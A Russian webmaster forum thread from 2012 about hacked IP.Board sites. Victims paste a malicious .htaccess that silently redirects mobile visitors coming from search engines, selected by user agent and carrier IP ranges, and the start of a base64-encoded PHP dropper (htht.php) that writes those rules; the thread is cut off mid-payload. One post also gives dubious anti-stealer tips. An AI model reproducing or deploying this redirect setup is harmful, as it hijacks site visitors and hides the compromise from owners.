Quicksdk Опубликовано 1 декабря, 2012 Поделиться Опубликовано 1 декабря, 2012 Уже как пару дней как взломан сайт. Не знаю что и делать... Вообщем сам взлом заключался в том, что бы при переходе из поиска показывать сообщение об обновление браузера. такое сообщение показывалось только на Chrome. Насколько я понял, была добавлена папка cgi-bin (именно была добавлена, потому что изначально я ее удалял) и там уже .htaccess и какой-то скрипт. Я попытался сделать откат к старому бэкапу где все было нормально. Но сейчас он выдает 404 Not Found The requested URL /cgi-bin/php5.2.cgi/index.php was not found on this server. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
egorea1999 Опубликовано 1 декабря, 2012 Поделиться Опубликовано 1 декабря, 2012 Тебя стилером походу ломанули Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Quicksdk Опубликовано 1 декабря, 2012 Автор Поделиться Опубликовано 1 декабря, 2012 Это как? .htaccess положенный в корень сайта RewriteEngine on RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] RewriteCond %{HTTP_USER_AGENT} bird [NC,OR] RewriteCond %{HTTP_USER_AGENT} blac [NC,OR] RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR] RewriteCond %{HTTP_USER_AGENT} brew [NC,OR] RewriteCond %{HTTP_USER_AGENT} cell [NC,OR] RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR] RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR] RewriteCond %{HTTP_USER_AGENT} dang [NC,OR] RewriteCond %{HTTP_USER_AGENT} doco [NC,OR] RewriteCond %{HTTP_USER_AGENT} eric [NC,OR] RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR] RewriteCond %{HTTP_USER_AGENT} inno [NC,OR] RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR] RewriteCond %{HTTP_USER_AGENT} java [NC,OR] RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR] RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR] RewriteCond %{HTTP_USER_AGENT} keji [NC,OR] RewriteCond %{HTTP_USER_AGENT} leno [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR] RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR] RewriteCond %{HTTP_USER_AGENT} maui [NC,OR] RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} mits [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR] RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR] RewriteCond %{HTTP_USER_AGENT} moto [NC,OR] RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR] RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} newt [NC,OR] RewriteCond %{HTTP_USER_AGENT} noki [NC,OR] RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR] RewriteCond %{HTTP_USER_AGENT} palm [NC,OR] RewriteCond %{HTTP_USER_AGENT} pana [NC,OR] RewriteCond %{HTTP_USER_AGENT} pant [NC,OR] RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR] RewriteCond %{HTTP_USER_AGENT} phil [NC,OR] RewriteCond %{HTTP_USER_AGENT} play [NC,OR] RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR] RewriteCond %{HTTP_USER_AGENT} port [NC,OR] RewriteCond %{HTTP_USER_AGENT} prox [NC,OR] RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR] RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR] RewriteCond %{HTTP_USER_AGENT} sage [NC,OR] RewriteCond %{HTTP_USER_AGENT} sams [NC,OR] RewriteCond %{HTTP_USER_AGENT} sany [NC,OR] RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR] RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} send [NC,OR] RewriteCond %{HTTP_USER_AGENT} seri [NC,OR] RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR] RewriteCond %{HTTP_USER_AGENT} shar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR] RewriteCond %{HTTP_USER_AGENT} siem [NC,OR] RewriteCond %{HTTP_USER_AGENT} smal [NC,OR] RewriteCond %{HTTP_USER_AGENT} smar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sony [NC,OR] RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR] RewriteCond %{HTTP_USER_AGENT} symb [NC,OR] RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR] RewriteCond %{HTTP_USER_AGENT} teli [NC,OR] RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR] RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR] RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR] RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR] RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR] RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR] RewriteCond %{HTTP_USER_AGENT} voda [NC,OR] RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR] RewriteCond %{HTTP_USER_AGENT} webc [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR] RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR] RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR] RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap [NC,OR] RewriteCond %{HTTP_USER_AGENT} phone [NC,OR] RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} Android [NC,OR] RewriteCond %{HTTP_USER_AGENT} pda [NC,OR] RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR] RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR] RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR] RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR] RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR] RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR] RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR] RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC] RewriteCond %{HTTP_USER_AGENT} !bsd [NC] RewriteCond %{HTTP_USER_AGENT} !x11 [NC] RewriteCond %{HTTP_USER_AGENT} !unix [NC] RewriteCond %{HTTP_USER_AGENT} !macos [NC] RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] RewriteCond %{HTTP_USER_AGENT} !playstation [NC] RewriteCond %{HTTP_USER_AGENT} !google [NC] RewriteCond %{HTTP_USER_AGENT} !yandex [NC] RewriteCond %{HTTP_USER_AGENT} !bot [NC] RewriteCond %{HTTP_USER_AGENT} !libwww [NC] RewriteCond %{HTTP_USER_AGENT} !msn [NC] RewriteCond %{HTTP_USER_AGENT} !america [NC] RewriteCond %{HTTP_USER_AGENT} !avant [NC] RewriteCond %{HTTP_USER_AGENT} !download [NC] RewriteCond %{HTTP_USER_AGENT} !fdm [NC] RewriteCond %{HTTP_USER_AGENT} !maui [NC] RewriteCond %{HTTP_USER_AGENT} !webmoney [NC] RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC] RewriteCond %{REMOTE_ADDR} ^193.201.2(?:29|3[01]) [OR] RewriteCond %{REMOTE_ADDR} ^213.243.64 [OR] RewriteCond %{REMOTE_ADDR} ^46.229.1(?:28|3[234]|4[01]) [OR] RewriteCond %{REMOTE_ADDR} ^83.149.[12389] [OR] RewriteCond %{REMOTE_ADDR} ^83.149.(?:2[14]|3[4-8]|4[3-79]|5[26-9]|6[0-3]) [OR] RewriteCond %{REMOTE_ADDR} ^83.149.48.[0-9] [OR] RewriteCond %{REMOTE_ADDR} ^83.149.48.[1-9][0-9] [OR] RewriteCond %{REMOTE_ADDR} ^83.149.48.1(?:[01][0-9]|2[0-7]) [OR] RewriteCond %{REMOTE_ADDR} ^83.229.224 [OR] RewriteCond %{REMOTE_ADDR} ^85.26.1(?:28|36|55|6[45]|8[346]|9[2-5]) [OR] RewriteCond %{REMOTE_ADDR} ^85.26.2(?:0[48]|1[26]|2[047-9]|3[0-5]|4[18]) [OR] RewriteCond %{REMOTE_ADDR} ^80.83.2(?:28|3[0-3]) [OR] RewriteCond %{REMOTE_ADDR} ^80.83.2(?:24|3[7-9]).[0-9] [OR] RewriteCond %{REMOTE_ADDR} ^80.83.2(?:24|3[7-9]).[1-9][0-9] [OR] RewriteCond %{REMOTE_ADDR} ^80.83.2(?:24|3[7-9]).1(?:[01][0-9]|2[0-7]) [OR] RewriteCond %{REMOTE_ADDR} ^84.17.25[45] [OR] RewriteCond %{REMOTE_ADDR} ^95.153.1(?:[6-8][0-9]|9[01]) [OR] RewriteCond %{REMOTE_ADDR} ^95.153.25[2-5] [OR] RewriteCond %{REMOTE_ADDR} ^194.54.1(?:4[89]|5[01]) [OR] RewriteCond %{REMOTE_ADDR} ^213.87 [OR] RewriteCond %{REMOTE_ADDR} ^217.8.2(?:2[6-9]|3[0-49]) [OR] RewriteCond %{REMOTE_ADDR} ^217.66.1(?:4[6-9]|5[0-26]) [OR] RewriteCond %{REMOTE_ADDR} ^217.74.24[47].1(?:2[89]|[3-9][0-9]) [OR] RewriteCond %{REMOTE_ADDR} ^217.74.24[47].2(?:[0-4][0-9]|5[0-5]) [OR] RewriteCond %{REMOTE_ADDR} ^217.74.2(?:4[589]|5[01]) RewriteCond %{HTTP_REFERER} (ya|yandex|google|mail|rambler|vk) [NC] RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo! slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC] Options -MultiViews RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] AddDefaultCharset utf-8 Action php5.2-script /cgi-bin/php5.2.cgi AddType php5.2-script .php Определелил еще кое-что. без .htaccess сайт вроде работает нормально ( там есть проблемка с mod_rewrite, но если брать ВООБЩЕ, тогда нормально). Но мне нужен этот .htaccess и когда я кидаю старый, он у меня перезаписывается... Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
_Dark_ Опубликовано 1 декабря, 2012 Поделиться Опубликовано 1 декабря, 2012 Все в .htaccess замените на <IfModule mod_rewrite.c> Options -MultiViews RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteRule .(jpeg|jpg|gif|png)$ /public/404.php [NC,L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> Все лишние файлы поудаляйте. В сканере IP.Board (центр безопасности) посмотрите есть ли какие-нибудь подозрительные файлы (имена странные), если да — удаляйте. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Quicksdk Опубликовано 1 декабря, 2012 Автор Поделиться Опубликовано 1 декабря, 2012 жесть... у меня в каждой папке .htaccess + в папке cache появились mobileNotification.cgi и w00t.php какие то еще файлы phpшные... Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Pashok(one) Опубликовано 1 декабря, 2012 Поделиться Опубликовано 1 декабря, 2012 Уже как пару дней как взломан сайт. Не знаю что и делать... Вообщем сам взлом заключался в том, что бы при переходе из поиска показывать сообщение об обновление браузера. такое сообщение показывалось только на Chrome. Насколько я понял, была добавлена папка cgi-bin (именно была добавлена, потому что изначально я ее удалял) и там уже .htaccess и какой-то скрипт. Я попытался сделать откат к старому бэкапу где все было нормально. Но сейчас он выдает 404 Not Found The requested URL /cgi-bin/php5.2.cgi/index.php was not found on this server. У меня тоже самое!!! на двух сайтах (на трёх) только когда с телефона входишь. Quicksdk 1 Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Quicksdk Опубликовано 1 декабря, 2012 Автор Поделиться Опубликовано 1 декабря, 2012 Ну а решение ты нашел? Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Pashok(one) Опубликовано 1 декабря, 2012 Поделиться Опубликовано 1 декабря, 2012 Ну а решение ты нашел? К сожелению нет Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
egorea1999 Опубликовано 2 декабря, 2012 Поделиться Опубликовано 2 декабря, 2012 Многие знают что такое стиллер и принцип его работыИз за стиллера у многих появилась фобия "Запомнить пароль"Многие боятся хранить свои пароли в браузере, так как стиллер их крадётНо есть такая идея, перед которой даже стиллер бессиленПриступем к самой идеикак мы знаем пароли в браузерах хранятся в спец. файловGoogle Chrome :XP -C:Documents and SettingsUsernameLocal SettingsApplication DataGoogleChromeUser DataDefaultв файле “Web Data”Vista -C:UsersUsernameAppdataLocalGoogleChromeUser DataDefaultв файле “Web Data”Firefox :Пассы в Firefox хранятся в файле signons.txt или signons2.txt или signons3.txt.Который лежит тут : [Windows Profil]Application DataMozillaFirefoxProfilesOpera :[Windows Profil]Application DataOperaOperaв файле wand.datНо как же их защитить от стиллера ?вы удивитесь как просто это сделатьвам надо только поменять имя или путь где лежат эти файлыДля того чтоб поменять имя или путь этих фалов надо открыть настройки браузеракак это делается читаем нижеДля FirefoxОткрываем браузерВ поле для урл пишем about:config и открываемЕсли это ваш первый вход то браузер предупредить вас чтоб вы были осторожныВам откроется окно где куча настроекНа верху в поле Поиск пишем signon и даем поискПоиск найдет 3 файлов “signon.txt” “signon2.txt” “signon3.txt”Два раза кликаем по этим файлом и меняем имяНо не забудьте , если вы signon.txt поменяли на pass.txt то signon2.txt должны поменять на pass2.txtВсе после этого перезапустите браузерВАЖНО! Перед тем как провернуть такую фишку не забудьте удалить все пароли из файлов “signon.txt” “signon2.txt” “signon3.txt”Для OperaКак выше уже отметил пассы от Оперы хранятся в файле wand.datНо мы несможем поменять имя файла, вместо этого мы поменяем место хранение файлаОткрываем браузерВ поле для урл пишем opera:config и открываемтут тоже в поле поиск пишем wand.datв оуне появляется наш файл и путь где он лежитнажимаем на обзор и открывается окно где лежит файлв этом же окне копируем wand.dat а потом переходим назад директорией вышетам создаем новую папкуоткрываем эту папку и сохраняем файл wand.dat (все эти операции мы делаем в окне которая открылась)И все выбираем этот файл и нажимаем Оки все файл с пассамы теперь будет лежать там куда мы его скопировалиСтарый файл уже можно удалятьВот и все. Уже стиллер несможет украсть ваши пассы. Так как мы поменяли место хранение файлаДля ChromeВ этом браузере мы несможем поменять что тоНо это незначит что мы несможем зашитить свои пассыДля этого есть спец. программа ChromeplusНо конечно для всего есть альтернативаДля тех кто нехочет копаться в настройках есть программа Kasperky Password ManagerУстанавливаем и защищаемся Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
_Dark_ Опубликовано 2 декабря, 2012 Поделиться Опубликовано 2 декабря, 2012 Никакой это не стиллер. Fensmas, это тот сайт, который мы в прошлый раз от взлома лечили или другой? Патч безопасности стоит? В рунете уже несколько случаев таких зафиксировано. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Quicksdk Опубликовано 2 декабря, 2012 Автор Поделиться Опубликовано 2 декабря, 2012 Тот же сайт. Патч не стоит. буду обновляться сейчас. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Pashok(one) Опубликовано 2 декабря, 2012 Поделиться Опубликовано 2 декабря, 2012 Тот же сайт. Патч не стоит. буду обновляться сейчас. Найдёшь решение напиши мне у меня 3 сайта заражены.... Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Quicksdk Опубликовано 2 декабря, 2012 Автор Поделиться Опубликовано 2 декабря, 2012 Я сделал так: удалил все лишние файлы с cache, удалил все .htaccess во всех папках, и обновил до 3.4. Вроде все. Цитата Ссылка на комментарий Поделиться на другие сайты Поделиться
Pashok(one) Опубликовано 2 декабря, 2012 Поделиться Опубликовано 2 декабря, 2012 Я сделал так: удалил все лишние файлы с cache, удалил все .htaccess во всех папках, и обновил до 3.4. Вроде все. Надеюсь у тебя всё получилось, помоги мне разобрать файлы cache Содержимое cache : Cодержимое странных файлов : htht.php <?set_time_limit(0); error_reporting(0); $codes='CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKUmV3cml0ZUVuZ2luZSBvbgpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYWNzIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGFsYXYgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYWxjYSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBhbW9pIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGF1ZGkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYXN0ZSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBhdmFuIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGJlbnEgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYmlyZCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBibGFjIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGJsYXogW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYnJldyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBjZWxsIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGNsZGMgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gY21kLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBkYW5nIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGRvY28gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gZXJpYyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBoaXB0IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGlubm8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gaXBhcSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBqYXZhIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGppZ3MgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0ga2RkaSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBrZWppIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGxlbm8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbGctYyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBsZy1kIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGxnLWcgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbGdlLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBtYXVpIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1heG8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbWlkcCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBtaXRzIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1tZWYgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbW9iaSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBtb3QtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1vdG8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbXdicCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBuZWMtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG5ld3QgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbm9raSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBvcHd2IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHBhbG0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcGFuYSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBwYW50IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHBkeGcgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcGhpbCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBwbGF5IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHBsdWMgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcG9ydCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBwcm94IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHF0ZWsgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcXdhcCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzYWdlIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNhbXMgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc2FueSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzY2gtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNlYy0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc2VuZCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzZXJpIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNnaC0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc2hhciBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzaWUtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNpZW0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc21hbCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzbWFyIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNvbnkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc3BoLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzeW1iIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHQtbW8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdGVsaSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB0aW0tIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHRvc2ggW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdHNtLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB1cGcxIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHVwc2kgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdmstdiBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB2b2RhIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHczY3MgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gd2FwLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3YXBhIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHdhcGkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gd2FwcCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3YXByIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHdlYmMgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gd2ludyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3aW53IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHhkYSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB4ZGEtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHVwLmJyb3dzZXIgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdXAubGluayBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3aW5kb3dzLmNlIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGllbW9iaWxlIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1pbmkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbW1wIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHN5bWJpYW4gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbWlkcCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3YXAgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcGhvbmUgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcG9ja2V0IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1v